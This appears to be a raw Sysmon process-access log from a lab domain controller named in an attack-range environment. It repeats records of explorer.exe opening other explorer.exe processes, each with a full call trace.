16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245020Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245019Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-60C4-603E-B0A8-00000000AD01}12500C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245018Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245017Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245016Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245014Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245013Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245012Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245011Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245010Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245009Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245008Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245007Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245006Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245005Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245004Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245003Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245002Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245001Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.717{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+45977|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF80071E698C8)|UNKNOWN(FFFF9F0F018B4978)|UNKNOWN(FFFF9F0F018AF625)|UNKNOWN(FFFF9F0F018B0B4A)|UNKNOWN(FFFF9F0F018AEE06)|UNKNOWN(FFFFF80071B80E03)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+a68d4|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002245000Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 